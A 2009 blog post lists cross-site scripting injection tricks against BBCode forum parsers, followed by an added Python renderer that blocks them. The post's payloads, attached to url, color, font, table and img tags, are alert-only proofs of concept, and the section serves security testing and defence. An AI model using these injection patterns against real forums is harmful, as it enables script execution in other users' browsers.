Thursday, 17 September 2009 20:54

I figured I'd do a little blog posting about finding and exploiting XSS vulnerabilities in BBCode implementations. Not many sources exist for this type of information, and certainly none exist that I am aware of that are as comprehensive.

I've been in contact with RSnake from ha.ckers.org about possibly adding a section to his infamous XSS Cheat Sheet concerning this, and he has responded favorably. Unfortunately, nothing has yet come of this, so I figured I would go ahead and write something up here. A lot of this comes from exploits I have personally found, and most can be found scattered throughout this site.

Most forums allow a user to preview their submissions before posting. This is a good place to test for injections before haphazardly submitting test code!

So, without further ado, here is the list. Feel free to submit any additions below.

  • URL Tag Injection

    The [url] tag can sometimes be injected with XSS, although this will always require a user to click on the link:

    [url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]

  • Color Tag Injection

    The [color] tag can sometimes be injected with arbitrary CSS styles, and on Internet Explorer 7 and earlier, scripts can be executed using IE's proprietary CSS 'expression()':

    [color=#ff0000;font-size:100px;]XSS[/color]

    If this tag results in a rather large, red "XSS", then the BBCode allows CSS styles to be injected. Internet Explorer 7 or earlier can thus be exploited using the 'expression' extension:

    [color=#ff0000;xss:expression(alert(String.fromCharCode(88,83,83)));]XSS[/color]

  • Font Tag Injection

    The [font] tag, like the [color] tag, can sometimes be injected with arbitrary CSS styles as well:

    [font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]

    If this tag results in a red "XSS" then the BBCode allows for CSS styles to be injected.

  • Table Tag Injection

    Some BBCode implementations allow users to construct tables, and sometimes pass arbitrary HTML attributes straight through to the generated markup.

    [table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onmouseover='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]

    Unfortunately, this requires a bit of user interaction (unless you are injecting CSS styles as above, in which case you will most likely be restricted to IE <= 7).

  • Nested URL Tag Injection

    Many BBCode implementations fail to handle malformed BBCode safely. By nesting BBCode tags it is sometimes possible to "break out" of the predefined tags and land inside the generated HTML element.

    [url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]

    This example comes from an exploit I found in the Joomla component Joo!BB.

  • IMG Tag Injection

    Every once in a while, the [img] tag will allow the addition of arbitrary HTML attributes. On any other element this would generally require at least some form of user interaction (mouse over, click, etc.), but the img tag has a special attribute: onerror. This fires a script if the image does not load. By providing a link to a known non-existent image, it is possible to execute arbitrary JavaScript:

    [img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]

  • Nested IMG Tag Injection

    This is basically the IMG Tag Injection above with a twist: using nested tags to achieve the injection. This is based on the vulnerability found by Julian A. Rodriguez affecting Phorum.

    [img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
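Every case in the list above comes down to an attribute value (a URL, a colour, a font list) that the BBCode parser copied into HTML without validating it. Below is an added example of the defensive pattern that stops all of them: escape the whole input first, then expand only tags whose attribute values pass a strict allowlist. It is not the post's code nor any forum's real implementation; the regexes and the `render`/`all_inert` helpers are assumptions written for this illustration, and the sample inputs are the post's own payloads.

```python
import re
from html import escape
# Hardened BBCode-to-HTML renderer (added example, not the post's code nor any
# forum's real implementation). HTML-escape the whole input first, then expand
# only tags whose attribute values pass a strict allowlist; tags that fail stay
# as escaped literal text, so no attacker-controlled value reaches an attribute.
SAFE_URL = re.compile(r"^https?://[^\s\"'<>]+$", re.I)              # scheme pinned
SAFE_COLOR = re.compile(r"^(#[0-9a-f]{3}|#[0-9a-f]{6}|[a-z]{1,20})$", re.I)
SAFE_FONT = re.compile(r"^[a-z0-9 ,-]{1,60}$", re.I)               # no ';' or ':'
TAG_URL = re.compile(r"\[url(?:=([^\]]+))?\](.*?)\[/url\]", re.I | re.S)
TAG_STYLE = re.compile(r"\[(color|font)=([^\]]+)\](.*?)\[/\1\]", re.I | re.S)
TAG_IMG = re.compile(r"\[img\](.*?)\[/img\]", re.I | re.S)

def _url(m):
    href, text = m.group(1) or m.group(2), m.group(2)
    if not SAFE_URL.match(href):
        return m.group(0)        # javascript: or a nested tag -> stays visible text
    return '<a href="%s">%s</a>' % (href, text)

def _style(m):
    tag, value, text = m.group(1).lower(), m.group(2), m.group(3)
    if not (SAFE_COLOR if tag == "color" else SAFE_FONT).match(value):
        return m.group(0)        # ';' or expression( never reaches a style attribute
    prop = "color" if tag == "color" else "font-family"
    return '<span style="%s:%s">%s</span>' % (prop, value, text)

def _img(m):
    src = m.group(1).strip()
    if not SAFE_URL.match(src):
        return m.group(0)        # onerror= smuggled via a quote or nesting fails here
    return '<img src="%s" alt="">' % src

def render(bbcode):
    html = escape(bbcode, quote=True)   # '<', '>', '&' and both quotes are now inert
    html = TAG_STYLE.sub(_style, html)
    html = TAG_IMG.sub(_img, html)
    return TAG_URL.sub(_url, html)
# Constructed sample inputs: the post's own payloads, which must all render inert.
PAYLOADS = [
    "[url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]",
    "[color=#ff0000;xss:expression(alert(String.fromCharCode(88,83,83)));]XSS[/color]",
    "[font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]",
    "[url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]",
    '[img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]',
    "[img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]",
]
def all_inert(inputs=PAYLOADS):
    # No '<' may survive: escape() removed the originals and no handler emitted one.
    return all("<" not in render(p) for p in inputs)
```

The preview trick mentioned earlier is the cheapest regression test for a forum operator: paste each payload, view source, and confirm the output contains no attribute or scheme that was not on the allowlist.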
Last Updated on Thursday, 17 September 2009 21:52
Comments (2)
1 Thursday, 15 July 2010 20:57
asdf88884
does this have a bbcode injection?
2 Monday, 12 December 2011 07:38
rNr
Very nice!
